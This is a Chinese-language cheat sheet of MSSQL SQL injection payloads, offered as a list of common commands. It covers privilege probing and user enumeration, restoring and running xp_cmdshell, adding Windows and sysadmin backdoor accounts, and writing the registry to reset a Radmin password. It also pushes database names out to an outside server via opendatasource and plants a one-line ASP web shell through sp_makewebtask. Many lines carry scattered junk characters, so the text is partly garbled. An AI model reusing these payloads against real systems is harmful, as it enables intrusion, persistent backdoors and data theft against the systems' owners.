常用的一些注入命令

admin

//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
0 o; E* o% P6 Z" z9 j" S  f/ d
//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

( G8 M! j% b6 _. I6 K6 V" y; K& |
1 X' K7 J- b) G( x3 ~5 x$ S! [数字类型
and char(124)%2Buser%2Bchar(124)=0

% c0 T' c" z% |5 w' u字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
# j# d7 z( h# B' {
  A8 H3 F; m2 u8 D' |7 |& l搜索类型
$ X- n0 L7 e2 E1 E9 j/ Y; U5 o' and char(124)%2Buser%2Bchar(124)=0 and '%'='
( Y6 N  k2 W; D$ m5 i# s: ~
爆用户名
and user>0
' and user>0 and ''='
4 q, v3 A2 r8 g# T
) a8 g/ {6 M! O0 S! {检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
2 S; \( Z. G" \6 vAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

0 t$ |: \3 k4 E+ z检测是不是MSSQL数据库
1 E4 _6 r: O) `* B6 O. l& ?and exists (select * from sysobjects);--
1 U' J- j6 t' U) D9 l0 c  [/ q
检测是否支持多行
% q" [0 I' T; f3 J- g/ g! V' R$ V;declare @d int;--
" \$ ^3 M6 O- z4 `  ?
恢复 xp_cmdshell
" H# y$ F: |5 ^) ]5 J2 o7 P4 R;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
; a5 l( r' G9 ~

select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
/ a4 B. V$ ]4 F8 x) a
//-----------------------
' L3 a2 ~& [. F5 @7 |: j  A//       执行命令
//-----------------------
3 E7 Q" v5 u% ~) Z首先开启沙盘模式：
0 c- i! c& ?  O: F- Cexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
) y, ?  X: B; S# d: q
* G& g  A8 }& @; `# E然后利用jet.oledb执行系统命令
; X2 ]  f( [( P1 |6 u: x4 tselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
. }' H2 _+ l) {  @; x) ^- R
8 {( }5 l) A* f8 C执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
. x2 M4 `6 i' @7 M
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

判断xp_cmdshell扩展存储过程是否存在：
3 j. b4 D3 i- a1 {6 l( O' `( D1 p9 khttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
3 g, I" \$ ?4 S  @. Y- J1 ~
写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
& d2 y1 N  v7 A# K9 i! v/ R. T
REG_SZ
1 c- N, l$ E: P# E* U3 l3 v
读注册表
9 Z. G" [$ H) @: \exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
9 c' ]4 H  b) `; k5 J& F! x
6 Y# E2 b' A% {5 h) V, ^读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1
8 O: ^- O0 N5 U1 ]8 ], L( U3 G1 N

数据库备份
backup database pubs to disk = 'c:\123.bak'
% ?" W- R% w1 {+ B  g5 D0 X6 |: m
5 y1 U' k7 C+ o& a//爆出长度
4 \! S! r3 G; b! \3 NAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--



% I* x* d# y; I2 [更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'新密码','sa'

添加和删除一个SA权限的用户test：
4 r2 Y( r% k1 m% j" B; B/ Kexec master.dbo.sp_addlogin test,9530772
' c  f( o5 c; A& d1 ^: j+ mexec master.dbo.sp_addsrvrolemember test,sysadmin
- R! E! w: G* k8 Y
) `! n. B+ Y7 }: v' D/ I删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
9 D4 c3 F- D, `% z
添加扩展存储过过程
! u% v( D3 C: G2 }3 z/ W" zEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
% {7 b4 K- d2 X" ?# a0 t9 G1 R( O% VGRANT exec On xp_proxiedadata TO public

* C4 S, k  p- U. Q
' r5 V1 ]/ s& v3 O停掉或激活某个服务。
6 W0 w, r) N) ]
exec master..xp_servicecontrol 'stop','schedule'
1 X, v: h2 b0 Rexec master..xp_servicecontrol 'start','schedule'
3 L$ B6 n8 B3 S7 X
: ^3 O7 N9 _& Y# g' J9 adbo.xp_subdirs
8 N' i% X* X7 H$ `8 w& }+ }
. i6 M1 b$ _1 ?% a5 ^7 y只列某个目录下的子目录。
- R# M, Y1 I0 p, ]5 T, Fxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
0 {4 k  i) _: e/ H+ Q) s1 g
) e2 z4 A, P2 Adbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
( c" l5 n2 _+ W" `+ B( {) O9 D所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
9 T9 [; a, r0 f) n6 q3 v* @0 B'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
8 h/ e. F) D- Q6 x/ u7 N: `'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
# d5 s; {# R' ?3 L: m$ `
xp_terminate_process
# k( u/ I# K& H( u" B8 t/ l
" o( J# I2 K3 z$ I3 Q2 a停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
3 W' X) q  J- y* X0 c3 {3 D
xp_terminate_process 2484

) Y  F8 }( \8 S) i# r1 p& uxp_unpackcab
5 I0 V, |* `! U2 M
) i3 O, n7 v4 C# W8 J; s: P解开压缩档。
& c3 N; C, y$ Q$ i" E  w
xp_unpackcab 'c:\test.cab','c:\temp',1


某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

4 E; X3 z3 A. ]1 h( l, t; G! ucreate database lcx;
' M3 i2 B& U. k1 I2 i- G. mCreate TABLE ku(name nvarchar(256) null);
( R% x8 Q4 J) U0 ACreate TABLE biao(id int NULL,name nvarchar(256) null);

/ r. B' ^9 h0 _2 `5 y//得到数据库名
0 Q; ^; O% q# [( D3 Minsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

- N) W$ _8 ]1 ^. d  J0 I
//在Master中创建表，看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
! w' O' |) L' G0 |
( ^* h+ o: }, x用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
1 H: G# K% e8 ^6 R6 ]
//更新表内容
' P' [5 `9 o- m. G3 I& g6 o9 jUpdate films SET kind = 'Dramatic' Where id = 123

//删除内容
delete from table_name where Stockid = 3